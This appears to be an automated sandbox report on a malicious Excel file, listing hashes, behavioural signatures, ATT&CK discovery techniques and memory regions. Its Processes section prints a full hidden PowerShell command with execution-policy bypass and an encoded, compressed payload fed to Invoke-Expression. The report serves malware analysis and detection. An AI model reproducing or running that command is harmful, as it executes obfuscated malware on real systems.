Analysis

  • max time kernel
    41s
  • max time network
    52s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 01:02

General

  • Target

    e4b272b64e21ab3f62479372b7466e68f81114e5b3e7b7479b7a0472580a2e68.xls

  • Size

    43KB

  • MD5

    d9464ee377d39336b2d7e67d5ea1817f

  • SHA1

    2b1fa3902f353209be180191dee90a984e1ba0a9

  • SHA256

    e4b272b64e21ab3f62479372b7466e68f81114e5b3e7b7479b7a0472580a2e68

  • SHA512

    a261e2a9fc7ab0f5fe905621a6fa0f3a94179fa4e8cd40d24396e2d25f519f701e48c5d3c0773413e6e07cb8fa06f0cfe7524d218b3d1469f55cc1adbf881a27

  • SSDEEP

    768:mzmB+k3hOdsylKlgryzc4bNhZFGzE+cL2knAJgRX42AAbXwrlIRbxCca8yfMy:+k3hOdsylKlgryzc4bNhZFGzE+cL2kno

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e4b272b64e21ab3f62479372b7466e68f81114e5b3e7b7479b7a0472580a2e68.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
      C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4392

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_odsijg00.hcs.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1384-12-0x00007FFE89080000-0x00007FFE89090000-memory.dmp
    Filesize

    64KB

  • memory/1384-4-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-2-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
    Filesize

    64KB

  • memory/1384-37-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-5-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
    Filesize

    64KB

  • memory/1384-7-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-6-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
    Filesize

    64KB

  • memory/1384-8-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-9-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-10-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-0-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
    Filesize

    64KB

  • memory/1384-11-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-13-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-14-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-15-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-38-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-17-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-18-0x00007FFE89080000-0x00007FFE89090000-memory.dmp
    Filesize

    64KB

  • memory/1384-30-0x000001851D3A0000-0x000001851E370000-memory.dmp
    Filesize

    15.8MB

  • memory/1384-35-0x000001851D3A0000-0x000001851E370000-memory.dmp
    Filesize

    15.8MB

  • memory/1384-36-0x000001851D3A0000-0x000001851E370000-memory.dmp
    Filesize

    15.8MB

  • memory/1384-3-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-16-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-39-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-40-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp
    Filesize

    2.0MB

  • memory/1384-66-0x000001851D3A0000-0x000001851E370000-memory.dmp
    Filesize

    15.8MB

  • memory/1384-65-0x000001851D3A0000-0x000001851E370000-memory.dmp
    Filesize

    15.8MB

  • memory/1384-64-0x000001851D3A0000-0x000001851E370000-memory.dmp
    Filesize

    15.8MB

  • memory/1384-1-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
    Filesize

    64KB

  • memory/4392-61-0x0000000006440000-0x000000000648C000-memory.dmp
    Filesize

    304KB

  • memory/4392-60-0x0000000006400000-0x000000000641E000-memory.dmp
    Filesize

    120KB

  • memory/4392-48-0x0000000005CA0000-0x0000000005D06000-memory.dmp
    Filesize

    408KB

  • memory/4392-45-0x0000000004FC0000-0x0000000004FD0000-memory.dmp
    Filesize

    64KB

  • memory/4392-54-0x0000000005D80000-0x0000000005DE6000-memory.dmp
    Filesize

    408KB

  • memory/4392-46-0x0000000005600000-0x0000000005C28000-memory.dmp
    Filesize

    6.2MB

  • memory/4392-47-0x00000000053D0000-0x00000000053F2000-memory.dmp
    Filesize

    136KB

  • memory/4392-59-0x0000000005DF0000-0x0000000006144000-memory.dmp
    Filesize

    3.3MB

  • memory/4392-41-0x0000000074840000-0x0000000074FF0000-memory.dmp
    Filesize

    7.7MB

  • memory/4392-43-0x0000000002D70000-0x0000000002DA6000-memory.dmp
    Filesize

    216KB

  • memory/4392-44-0x0000000004FC0000-0x0000000004FD0000-memory.dmp
    Filesize

    64KB

  • memory/4392-67-0x0000000004FC0000-0x0000000004FD0000-memory.dmp
    Filesize

    64KB

  • memory/4392-68-0x0000000007AD0000-0x000000000814A000-memory.dmp
    Filesize

    6.5MB

  • memory/4392-69-0x0000000007470000-0x000000000748A000-memory.dmp
    Filesize

    104KB